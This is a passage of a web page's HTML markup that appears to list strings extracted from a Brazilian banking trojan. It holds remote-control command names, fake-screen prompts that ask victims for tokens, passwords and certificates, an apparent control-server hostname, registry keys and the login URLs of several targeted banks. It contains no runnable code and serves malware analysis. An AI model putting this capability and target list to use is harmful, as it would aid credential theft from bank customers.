<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Informaçao de Data é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TB#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Código informado é inválido</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iToken informado é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#DTN#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Informaçao de Data é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iToken informado é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha incorreta, insira novamente.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SJAVA#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN8#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#ASSI#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#ASSI#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SNCARD#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SNCRT#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha certificado informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TB#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Chave informada é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GBPLUGIN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SCPAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GBPLUGIN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SCPAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GBPLUGIN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SCPAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Explorer</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-IE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Google Chrome</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-CR</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Firefox</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-FF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">moparaiso.saves-the-whales.com</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">l1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\l1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\p1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\p2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">chave</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PONG#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PING</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CONWATCH</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CR</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">IE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Visualização Ativada#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EXECUTAPRO</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ATUALIZAPRO</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">NOVOLINK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">NOVASPORTAS</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LINKPORTAS</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LINKDEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">l1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\l1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PORTASDEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\p1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\p2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LINKPORTASDEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">STOPWATCH</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PRTSCR</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Opcões de Prt(</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">%)#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AeroEnabled</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AeroDesable</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TECLADO</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SI</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#KeyPress Mouse </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#KeyPress </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SENDTEXT2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Handle Mouse#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Handle Navegador #</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">COLARTXT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Handle Navegador#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POSTKEY</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#POSTKEY Handle Mouse#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#POSTKEY Handle Navegador#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SENDKEY</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#SENDKEY Handle Navegador#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SENDIMPUT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Texto Colado SENDIMPUT#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CERTIFICADO</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SunAwtFrame</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Certificado#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LIMPARCRT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">VERKEY</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SJAVA#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HideCursor</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ShowCursor</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Mousedrop</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drop</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Mousedrag</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drag</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Mousemove</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">move</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MOUSE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MOVE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#MOVE Prt(</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CLICK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#CLICK Prt(</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CLICKORIGI</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EXIT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">KILLNAV</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HIDEFAKE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Oculto#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Inativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHOWFAKE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Mostrado#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SENDMSG</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Microsoft Internet Explorer</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Google Chrome</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FREENAV</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TRAVAR24</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BRAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SANTA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SICREDI</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Block</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">KILLKL</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TELAFAKE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITFISICA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITAFISICA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TELAGB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaFisica Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaFisica ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETTK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Token#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSN6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Senha6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETTB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Posicao Tabela#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETDTN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dd</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dia</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">(dd)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mm</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mes</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">(mm)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aaaa</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ano</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">(aaaa)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo opcao de data </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSGFIM</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Msg Final mostrada#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITEMPRESA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Ita Empresa Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Ita Empresa ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITPERSONAL</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaPersonal Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaPersonal ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ITUNICLASS</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaUniclass Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake ItaUniclass ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BBF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake BBF Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake BBF ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake GF Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake GF ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSJAVA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Certificado#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSN8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo SENHA8#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake CEF Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake CEF ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETASS</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Assinatura fisica#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETASSJU</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Assinatura Juridica#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Bradesco Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake Bradesco ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Tokem#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Chave#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSNCRT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake SANTA Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Fake SANTA ja esta Ativo#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETSN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Número de Serie#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GETTKT</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pedindo Assinatura#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">XP</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">W7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">W8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Tela Fake inativa#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pau no WatchImage#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BITM!</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Pau no csImagemRead#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">identificacao.jsf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bradesco.com</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">banco bradesco</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iniciasessao.asp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iniciasessaolegado.asp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Block</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\BRAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BRAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CR</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">IE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bb.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bancobrasil</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bb.com</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapf/login.jsp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapj/loginmpe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapj/logincor</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapj/loginpfe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aapj.bb.com</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">verificando solução de segurança</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\BB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internet banking</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">santander.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">santandernet.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">www.santandernetibe.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">santanderempresarial.com.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Banco Santander Brasil</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">banco santander brasil</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\SANTA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SANTA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sicreditotal</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sicredi</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Sicredi</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\SICRED</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SICREDI</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">caixa.gov.br/SIIBC/index.processa</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">caixa econômica federal</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingcaixa</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">siwinCtrl</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">caixa.gov.br</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingpf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Blackberry\CEF</span></div>
<div class="separator" style="clear: both;">
